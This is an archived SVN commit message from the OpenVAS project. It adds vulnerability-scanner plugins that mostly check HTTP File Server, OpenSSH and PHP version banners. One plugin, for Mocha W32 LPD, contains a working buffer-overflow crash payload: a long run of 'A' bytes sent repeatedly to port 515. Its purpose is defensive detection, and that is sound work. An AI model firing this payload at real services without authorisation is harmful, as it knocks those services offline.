[Openvas-commits] r7357 - in trunk/openvas-plugins: . scripts

scm-commit@wald.intevation.org scm-commit at wald.intevation.org
Mon Apr 19 20:46:05 CEST 2010


Author: mime
Date: 2010-04-19 20:46:01 +0200 (Mon, 19 Apr 2010)
New Revision: 7357

Added:
   trunk/openvas-plugins/scripts/gb_http_file_server_39544.nasl
   trunk/openvas-plugins/scripts/gb_mocha_w32_lpd_39498.nasl
   trunk/openvas-plugins/scripts/gb_openssh_28444.nasl
   trunk/openvas-plugins/scripts/gb_php_30649.nasl
   trunk/openvas-plugins/scripts/gb_php_31612.nasl
   trunk/openvas-plugins/scripts/gb_php_35440.nasl
Modified:
   trunk/openvas-plugins/ChangeLog
   trunk/openvas-plugins/scripts/secpod_ssl_ciphers.nasl
Log:
Added new plugins. Exit if port have no ssl support.

Modified: trunk/openvas-plugins/ChangeLog
===================================================================
--- trunk/openvas-plugins/ChangeLog	2010-04-19 15:34:43 UTC (rev 7356)
+++ trunk/openvas-plugins/ChangeLog	2010-04-19 18:46:01 UTC (rev 7357)
@@ -1,3 +1,16 @@
+2010-04-19  Michael Meyer <michael.meyer at greenbone.net>
+
+	* scripts/gb_http_file_server_39544.nasl,
+	scripts/gb_php_30649.nasl,
+	scripts/gb_mocha_w32_lpd_39498.nasl,
+	scripts/gb_php_35440.nasl,
+	scripts/gb_php_31612.nasl,
+	scripts/gb_openssh_28444.nasl:
+	Added new plugins.
+
+	* scripts/secpod_ssl_ciphers.nasl:
+	Exit if port have no ssl support.
+
 2010-04-19  Chandrashekhar B <bchandra at secpod.com>
 
 	* scripts/secpod_ssl_ciphers.inc,

Added: trunk/openvas-plugins/scripts/gb_http_file_server_39544.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_http_file_server_39544.nasl	2010-04-19 15:34:43 UTC (rev 7356)
+++ trunk/openvas-plugins/scripts/gb_http_file_server_39544.nasl	2010-04-19 18:46:01 UTC (rev 7357)
@@ -0,0 +1,84 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# HTTP File Server Security Bypass and Denial of Service Vulnerabilities
+#
+# Authors:
+# Michael Meyer <michael.meyer at greenbone.net>
+#
+# Copyright:
+# Copyright (c) 2010 Greenbone Networks GmbH
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(100585);
+ script_bugtraq_id(39544);
+ script_version ("1.0-$Revision$");
+
+ script_name("HTTP File Server Security Bypass and Denial of Service Vulnerabilities");
+
+desc = "Overview:
+HTTP File Server is prone to multiple vulnerabilities including a security-
+bypass issue and a denial-of-service issue.
+
+Exploiting these issues will allow an attacker to download files from
+restricted directories within the context of the application or cause
+denial-of-service conditions.
+
+Solution:
+Reportedly the vendor has fixed the issue. Please see the references
+for more information.
+
+References:
+http://www.securityfocus.com/bid/39544
+http://www.rejetto.com/hfs/?f=intro
+http://aluigi.altervista.org/adv/hfsref-adv.txt";
+
+ script_tag(name:"risk_factor", value:"Medium");
+ script_description(desc);
+ script_summary("Determine if HTTP File Server is prone to multiple vulnerabilities");
+ script_category(ACT_GATHER_INFO);
+ script_family("Web Servers");
+ script_copyright("This script is Copyright (C) 2010 Greenbone Networks GmbH");
+ script_dependencies("find_service.nes");
+ script_require_ports("Services/www", 8080);
+ exit(0);
+}
+
+
+include("http_func.inc");
+
+port = get_http_port(default:8080);
+if(!get_port_state(port))exit(0);
+
+banner = get_http_banner(port: port);
+if(!banner)exit(0);
+if("Server: HFS" >!< banner)exit(0);
+
+version = eregmatch(pattern:"Server: HFS ([0-9.]+)([a-z]*)", string:banner);
+if(isnull(version[1]))exit(0);
+
+if(version[1] == "2.2") {
+  if(version[2] =~ "^[a-e]" || version[2] == NULL) {
+    security_warning(port:port);
+    exit(0);
+  }  
+}  
+
+exit(0);
+


Property changes on: trunk/openvas-plugins/scripts/gb_http_file_server_39544.nasl
___________________________________________________________________
Name: svn:keywords
   + Id Revision

Added: trunk/openvas-plugins/scripts/gb_mocha_w32_lpd_39498.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_mocha_w32_lpd_39498.nasl	2010-04-19 15:34:43 UTC (rev 7356)
+++ trunk/openvas-plugins/scripts/gb_mocha_w32_lpd_39498.nasl	2010-04-19 18:46:01 UTC (rev 7357)
@@ -0,0 +1,108 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# Mocha W32 LPD Remote Buffer Overflow Vulnerability
+#
+# Authors:
+# Michael Meyer <michael.meyer at greenbone.net>
+#
+# Copyright:
+# Copyright (c) 2010 Greenbone Networks GmbH
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(100580);
+ script_bugtraq_id(39498);
+ script_version ("1.0-$Revision$");
+
+ script_name("Mocha W32 LPD Remote Buffer Overflow Vulnerability");
+
+desc = "Overview:
+Mocha W32 LPD is prone to a remote buffer-overflow vulnerability
+because the software fails to perform adequate boundary checks on user-
+supplied data.
+
+Successful exploits may allow attackers to execute arbitrary code with
+the privileges of the user running the affected application. Failed
+exploit attempts will result in a denial-of-service condition.
+
+This issue affects W32 LPD 1.9; other versions may be
+vulnerable as well.
+
+References:
+http://www.securityfocus.com/bid/39498
+http://mochasoft.dk/lpd.htm
+";
+
+ script_tag(name:"risk_factor", value:"Medium");
+ script_description(desc);
+ script_summary("Determine if Mocha W32 LPD is prone to a remote buffer-overflow vulnerability");
+ script_category(ACT_DENIAL);
+ script_family("Denial of Service");
+ script_copyright("This script is Copyright (C) 2010 Greenbone Networks GmbH");
+ script_dependencies("find_service.nes");
+ script_require_ports("Services/lpd", 515);
+ exit(0);
+}
+
+include("misc_func.inc");
+
+function check_lpd(port) {
+ 
+  soc = open_priv_sock_tcp(dport:port);
+  if(!soc)return FALSE;
+
+  data = string("OpenVAS", rand());
+  req = raw_string(0x04) + data + " " + raw_string(0x0a);
+  send(socket:soc, data:req);
+  res = recv(socket:soc, length:1024);
+  close(soc);
+
+  if(!res || "printer" >!< tolower(res))return FALSE;
+
+  return TRUE;
+}  
+
+if(safe_checks())exit(0);
+
+port = get_kb_item("Services/lpd");
+if(!port)port="515";
+
+if(!get_port_state(port))exit(0);
+
+if(!check_lpd(port:port))exit(0);
+
+exploit  = raw_string("\x05\x64\x65\x66\x61\x75\x6c\x74\x20");
+exploit += crap(data:raw_string("\x41"),length:1500);
+exploit += raw_string("\x20\x61\x6c\x6c\x0a");
+
+for(i=0;i<5;i++) {
+  soc = open_sock_tcp(port);
+  if(!soc)break;
+  send(socket:soc, data:raw_string("\x02"));
+  send(socket:soc, data:exploit);
+  close(soc);
+  sleep(1);
+}
+
+if(!check_lpd(port:port)) {
+  security_warning(port:port);
+  exit(0);
+}  
+
+exit(0);


Property changes on: trunk/openvas-plugins/scripts/gb_mocha_w32_lpd_39498.nasl
___________________________________________________________________
Name: svn:keywords
   + Id Revision

Added: trunk/openvas-plugins/scripts/gb_openssh_28444.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_openssh_28444.nasl	2010-04-19 15:34:43 UTC (rev 7356)
+++ trunk/openvas-plugins/scripts/gb_openssh_28444.nasl	2010-04-19 18:46:01 UTC (rev 7357)
@@ -0,0 +1,100 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# OpenSSH X Connections Session Hijacking Vulnerability
+#
+# Authors:
+# Michael Meyer <michael.meyer at greenbone.net>
+#
+# Copyright:
+# Copyright (c) 2010 Greenbone Networks GmbH
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(100584);
+ script_bugtraq_id(28444);
+ script_cve_id("CVE-2008-1483");
+ script_version ("1.0-$Revision$");
+
+ script_name("OpenSSH X Connections Session Hijacking Vulnerability");
+
+desc = "Overview:
+OpenSSH is prone to a vulnerability that allows attackers to hijack
+forwarded X connections.
+
+Successfully exploiting this issue may allow an attacker run arbitrary
+shell commands with the privileges of the user running the affected
+application.
+
+This issue affects OpenSSH 4.3p2; other versions may also be affected.
+
+NOTE: This issue affects the portable version of OpenSSH and may not
+      affect OpenSSH running on OpenBSD.
+
+Solution:
+Updates are available. Please see the references for more information.
+
+References:
+http://www.securityfocus.com/bid/28444
+http://support.apple.com/kb/HT3137
+http://www.openbsd.org/errata41.html
+http://www.openbsd.org/errata42.html
+http://www.openbsd.org/errata43.html
+http://www.openssh.com/txt/release-5.0
+http://www.openssh.com
+http://sourceforge.net/project/shownotes.php?release_id=590180
+http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=463011
+http://www.securityfocus.com/archive/1/492447
+http://aix.software.ibm.com/aix/efixes/security/ssh_advisory.asc
+http://support.avaya.com/elmodocs2/security/ASA-2008-205.htm
+http://www.globus.org/mail_archive/security-announce/2008/04/msg00000.html
+http://support.attachmate.com/techdocs/2374.html#Security_Updates_in_7.0_SP1
+http://sunsolve.sun.com/search/document.do?assetkey=1-66-237444-1
+";
+
+ script_tag(name:"risk_factor", value:"High");
+ script_description(desc);
+ script_summary("Determine if if remote OpenSSH version is vulnerable.");
+ script_category(ACT_GATHER_INFO);
+ script_family("General");
+ script_copyright("This script is Copyright (C) 2010 Greenbone Networks GmbH");
+ script_dependencies("ssh_detect.nasl");
+ script_require_ports("Services/ssh", 22);
+ exit(0);
+}
+
+include("backport.inc");
+include("version_func.inc");
+
+port = get_kb_item("Services/ssh");
+if(!port) port = 22;
+
+banner = get_kb_item("SSH/banner/" + port);
+if ( ! banner ) exit(0);
+
+banner = tolower(get_backport_banner(banner:banner));
+version = eregmatch(pattern:"ssh-.*openssh[_-]{1}([0-9.]+[p0-9]*)", string: banner);
+if(isnull(version[1]))exit(0);
+vers = str_replace(find:"p", replace:".p", string:version[1]);
+
+if(version_is_less(version: vers, test_version: "4.3.p2")) {
+  security_hole(port);
+  exit(0);
+}
+
+exit(0);


Property changes on: trunk/openvas-plugins/scripts/gb_openssh_28444.nasl
___________________________________________________________________
Name: svn:keywords
   + Id Revision

Added: trunk/openvas-plugins/scripts/gb_php_30649.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_php_30649.nasl	2010-04-19 15:34:43 UTC (rev 7356)
+++ trunk/openvas-plugins/scripts/gb_php_30649.nasl	2010-04-19 18:46:01 UTC (rev 7357)
@@ -0,0 +1,93 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# PHP Multiple Buffer Overflow Vulnerabilities
+#
+# Authors:
+# Michael Meyer <michael.meyer at greenbone.net>
+#
+# Copyright:
+# Copyright (c) 2010 Greenbone Networks GmbH
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(100583);
+ script_bugtraq_id(30649);
+ script_cve_id("CVE-2008-3659","CVE-2008-3658");
+ script_version ("1.0-$Revision$");
+
+ script_name("PHP Multiple Buffer Overflow Vulnerabilities");
+
+desc = "Overview:
+PHP is prone to multiple buffer-overflow vulnerabilities.
+
+Successful exploits may allow attackers to execute arbitrary code in
+the context of applications using the vulnerable PHP functions. This
+may result in a compromise of the underlying system. Failed attempts
+may lead to a denial-of-service condition.
+
+Versions prior to PHP 4.4.9 and PHP 5.2.8 are vulnerable.
+
+Solution:
+Updates are available. Please see the references for more information.
+
+References:
+http://www.securityfocus.com/bid/30649
+http://www.php.net/ChangeLog-5.php#5.2.8
+http://www.php.net/archive/2008.php#id2008-08-07-1
+http://www.php.net/
+http://support.avaya.com/elmodocs2/security/ASA-2009-161.htm
+";
+
+script_tag(name:"risk_factor", value:"Medium");
+script_description(desc);
+script_summary("Determine if installed php version is vulnerable.");
+script_category(ACT_GATHER_INFO);
+script_family("Web application abuses");
+script_copyright("This script is Copyright (C) 2010 Greenbone Networks GmbH");
+script_dependencies("gb_php_detect.nasl");
+script_require_ports("Services/www", 80);
+exit(0);
+}
+
+include("http_func.inc");
+include("version_func.inc");
+
+port = get_http_port(default:80);
+if(!get_port_state(port))exit(0);
+
+if (!can_host_php(port:port)) exit(0);
+
+if(vers = get_kb_item("www/" + port + "/PHP")) {
+
+  if(vers =~ "^4\.4") {
+    if(version_is_less(version: vers, test_version: "4.4.9")) {
+        security_warning(port:port);
+        exit(0);
+    }
+  }
+
+  if(vers =~ "^5\.2") {
+    if(version_is_less(version: vers, test_version: "5.2.8")) {
+        security_warning(port:port);
+        exit(0);
+    }
+  }
+}
+
+exit(0);


Property changes on: trunk/openvas-plugins/scripts/gb_php_30649.nasl
___________________________________________________________________
Name: svn:keywords
   + Id Revision

Added: trunk/openvas-plugins/scripts/gb_php_31612.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_php_31612.nasl	2010-04-19 15:34:43 UTC (rev 7356)
+++ trunk/openvas-plugins/scripts/gb_php_31612.nasl	2010-04-19 18:46:01 UTC (rev 7357)
@@ -0,0 +1,92 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# PHP FastCGI Module File Extension Denial Of Service Vulnerabilities
+#
+# Authors:
+# Michael Meyer <michael.meyer at greenbone.net>
+#
+# Copyright:
+# Copyright (c) 2010 Greenbone Networks GmbH
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(100582);
+ script_bugtraq_id(31612);
+ script_cve_id("CVE-2008-3660");
+ script_version ("1.0-$Revision$");
+
+ script_name("PHP FastCGI Module File Extension Denial Of Service Vulnerabilities");
+
+desc = "Overview:
+PHP is prone to a denial-of-service vulnerability because the
+application fails to handle certain file requests.
+
+Attackers can exploit this issue to crash the affected application,
+denying service to legitimate users.
+
+PHP 4.4 prior to 4.4.9 and PHP 5.2 through 5.2.6 are vulnerable.
+
+Solution:
+Updates are available. Please see the references for more information.
+
+References:
+http://www.securityfocus.com/bid/31612
+http://www.openwall.com/lists/oss-security/2008/08/08/2
+http://www.php.net/ChangeLog-5.php#5.2.8
+http://www.php.net
+http://support.avaya.com/elmodocs2/security/ASA-2009-161.htm";
+
+ script_tag(name:"risk_factor", value:"Medium");
+ script_description(desc);
+ script_summary("Determine if installed php version is vulnerable");
+ script_category(ACT_GATHER_INFO);
+ script_family("Web application abuses");
+ script_copyright("This script is Copyright (C) 2010 Greenbone Networks GmbH");
+ script_dependencies("gb_php_detect.nasl");
+ script_require_ports("Services/www", 80);
+ script_exclude_keys("Settings/disable_cgi_scanning");
+ exit(0);
+}
+
+include("http_func.inc");
+include("version_func.inc");
+
+port = get_http_port(default:80);
+if(!get_port_state(port))exit(0);
+
+if (!can_host_php(port:port)) exit(0);
+
+if(vers = get_kb_item("www/" + port + "/PHP")) {
+
+  if(vers =~ "^4\.4") {
+    if(version_is_less(version: vers, test_version: "4.4.9")) {
+        security_warning(port:port);
+        exit(0);
+    }
+  }
+
+  if(vers =~ "^5\.2") {
+    if(version_is_less(version: vers, test_version: "5.2.8")) {
+        security_warning(port:port);
+        exit(0);
+    }
+  }
+}
+
+exit(0);


Property changes on: trunk/openvas-plugins/scripts/gb_php_31612.nasl
___________________________________________________________________
Name: svn:keywords
   + Id Revision

Added: trunk/openvas-plugins/scripts/gb_php_35440.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_php_35440.nasl	2010-04-19 15:34:43 UTC (rev 7356)
+++ trunk/openvas-plugins/scripts/gb_php_35440.nasl	2010-04-19 18:46:01 UTC (rev 7357)
@@ -0,0 +1,86 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# PHP 'exif_read_data()' JPEG Image Processing Denial Of Service Vulnerability
+#
+# Authors:
+# Michael Meyer <michael.meyer at greenbone.net>
+#
+# Copyright:
+# Copyright (c) 2010 Greenbone Networks GmbH
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(100581);
+ script_bugtraq_id(35440);
+ script_cve_id("CVE-2009-2687");
+ script_version ("1.0-$Revision$");
+
+ script_name("PHP 'exif_read_data()' JPEG Image Processing Denial Of Service Vulnerability");
+
+desc = "Overview:
+PHP is prone to a denial-of-service vulnerability in its
+exif_read_data()' function.
+
+Successful exploits may allow remote attackers to cause denial-of-
+service conditions in applications that use the vulnerable function.
+
+Versions prior to PHP 5.2.10 are affected.
+
+Solution:
+Updates are available. Please see the references for more information.
+
+References:
+http://www.securityfocus.com/bid/35440
+http://www.php.net/releases/5_2_10.php
+http://www.php.net/
+http://lists.debian.org/debian-security-announce/2009/msg00263.html
+http://archives.neohapsis.com/archives/fulldisclosure/2009-08/0339.html
+http://support.avaya.com/css/P8/documents/100072880
+";
+
+script_tag(name:"risk_factor", value:"Medium");
+script_description(desc);
+script_summary("Determine if installed php version is vulnerable");
+script_category(ACT_GATHER_INFO);
+script_family("Web application abuses");
+script_copyright("This script is Copyright (C) 2010 Greenbone Networks GmbH");
+script_dependencies("gb_php_detect.nasl");
+script_require_ports("Services/www", 80);
+exit(0);
+}
+
+include("http_func.inc");
+include("version_func.inc");
+
+port = get_http_port(default:80);
+if(!get_port_state(port))exit(0);
+
+if (!can_host_php(port:port)) exit(0);
+
+if(vers = get_kb_item("www/" + port + "/PHP")) {
+
+  if(vers =~ "^5\.2") { 
+    if(version_is_less(version: vers, test_version: "5.2.10")) {
+        security_warning(port:port);
+        exit(0);
+    }
+  }
+}
+
+exit(0);


Property changes on: trunk/openvas-plugins/scripts/gb_php_35440.nasl
___________________________________________________________________
Name: svn:keywords
   + Id Revision

Modified: trunk/openvas-plugins/scripts/secpod_ssl_ciphers.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_ssl_ciphers.nasl	2010-04-19 15:34:43 UTC (rev 7356)
+++ trunk/openvas-plugins/scripts/secpod_ssl_ciphers.nasl	2010-04-19 18:46:01 UTC (rev 7357)
@@ -87,10 +87,10 @@
         c_hello = construct_ssl_req(SSL_VER:SSL_VER, CIPHER:CIPHER_CODE);
         s_hello = get_ssl_server_hello(ssl_req:c_hello);
         if(!s_hello || isnull(s_hello)){
-          continue;
+          exit(0); # no ssl port
         }
         if(!(ord(s_hello[2]) == 4 && ord(s_hello[5]) == 0 && ord(s_hello[6]) == 2)){
-          continue;
+          exit(0); # no ssl port
         }
     }
   }



More information about the Openvas-commits mailing list